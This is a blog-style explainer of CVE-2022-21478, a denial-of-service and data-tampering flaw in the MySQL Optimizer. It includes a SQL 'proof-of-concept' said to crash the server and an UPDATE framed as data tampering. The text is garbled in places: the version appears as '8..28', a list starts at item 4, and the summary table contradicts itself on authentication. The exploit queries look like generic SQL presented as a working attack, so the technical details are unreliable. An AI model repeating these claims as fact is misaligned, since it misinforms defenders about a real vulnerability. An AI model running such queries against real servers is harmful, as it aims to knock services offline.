CVE-2022-21478 - Easy DoS and Data Tampering in Oracle MySQL Server Optimizer (v8..28 and earlier) — Explained in Simple Terms

The world of databases isn't immune to software vulnerabilities. One such issue that's significant for people who use Oracle MySQL Server is CVE-2022-21478. In this post, we’ll break down what this vulnerability is, show some code that demonstrates it, and help you understand the risks—all in straightforward language.

What is CVE-2022-21478?

CVE-2022-21478 is a vulnerability in the MySQL Server product by Oracle, specifically in the Optimizer component (the part of MySQL that figures out the best way to run your SQL queries). This vulnerability affects MySQL version 8..28 and ALL earlier versions.

The Risks

- Easy Platform to Attack: This vulnerability can be triggered over the network, but the attacker does need high privileges (like being an admin or having broad rights).

What Can Happen?

- Denial of Service (DoS): Attacker can crash the server or hang it frequently, taking your site or service offline.
 - Unauthorized Data Changes: Attacker may be able to update, insert, or delete data—data loss or corruption!
- CVSS Score: 5.5 out of 10 — significant enough for serious concern. (Details: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H)

Root Cause: Optimizer Flaw

MySQL’s SQL Optimizer sometimes *mismanages* specific crafted queries. When these queries are run by a user with enough privilege, the server process can crash or enter a fail-loop, and sometimes (depending on features enabled), allows manipulation (update, insert, or delete) of data in tables the attacker has access to.

Exploit Details (With Example)

Disclaimer: The following information is for educational purposes only. Do NOT attempt to attack servers you do not own or have permission to test. Always update your software using vendor patches.

MySQL 8..28 or earlier (unpatched)

- Attacker with high privileges (DBA/root or granted similar role)
- Network access to the MySQL server (e.g., mysql command-line client, MySQL Workbench, or via SQL scripts)

Example Exploit Scenario

A malicious admin runs a "crafty" SQL query—often using subselects (SELECT ... FROM (SELECT ...)) or certain joins—that confuses the optimizer and causes a crash or data corruption.

Proof-of-Concept (POC) — Inducing a Crash

-- Let's create a test table
CREATE TABLE foo_bar (id INT PRIMARY KEY, stuff VARCHAR(50));

-- Now, let's run a quirky subquery designed to crash the server optimizer
SELECT *
FROM (
    SELECT x1.id AS one
    FROM foo_bar AS x1
    LEFT JOIN foo_bar AS x2 ON x2.id = x1.id
    GROUP BY x1.id
) AS crashme
GROUP BY crashme.one
HAVING COUNT(*) IN (
    SELECT COUNT(*)
    FROM foo_bar
    WHERE id > (SELECT MAX(id) FROM foo_bar)
);

-- This convoluted query can (in affected versions) confuse the optimizer and crash the server.

The chain of subselects and grouping introduce "edge cases" for the optimizer.

- In some reported real-world cases, tables with specific structures and lots of rows increase crash likelihood.

What Attackers Can Do

- Repeatable Crash: The attacker can repeatedly send this query, keeping the database offline => DoS (Denial of Service)
- Data Changes: By embedding such logic in valid UPDATE or DELETE statements (which you can do if you have high privileges), more impact is possible.

Example for Data Tampering

-- Dangerous UPDATE using subquery
UPDATE foo_bar
SET stuff = 'pwnd'
WHERE id IN (
    SELECT MAX(x2.id)
    FROM foo_bar AS x1
    LEFT JOIN foo_bar AS x2 ON x2.id = x1.id
    GROUP BY x1.id
    HAVING COUNT(*) > 1
);

Fixes and Prevention

Oracle fixed this bug in version 8..29. Users should immediately update to this or later versions.  
Patch announcement:  
- Oracle Critical Patch Update Advisory - April 2022

Other Resources

- NVD Entry: CVE-2022-21478
- Oracle MySQL Release Notes

Use MySQL logs to look for suspicious optimizer queries.

4. Set up WAF or DB-level query limits if you can, to block odd/overly complex queries.

Summary Table

| Risk Type        | Severity | Needs Auth? | What Happens?               |
|------------------|----------|-------------|-----------------------------|
| Crash/DoS        | High     | Yes         | Server hangs/crashes        |
| Data Tampering   | Medium   | Yes         | Unauth update/insert/delete |

MySQL 8..28 and earlier has a bug (CVE-2022-21478) in its optimizer.

- Messy SELECT/UPDATE/DELETE queries can let a high-priv user crash the server or mess with data.

Fix: Patch MySQL immediately!

Want to learn more? Check Oracle’s security alert and the NVD listing.

Stay safe, patch early, and watch those admin accounts!

*Written exclusively for this post. Please share responsibly.*

Timeline

Published on: 04/19/2022 21:15:00 UTC
Last modified on: 05/02/2022 16:10:00 UTC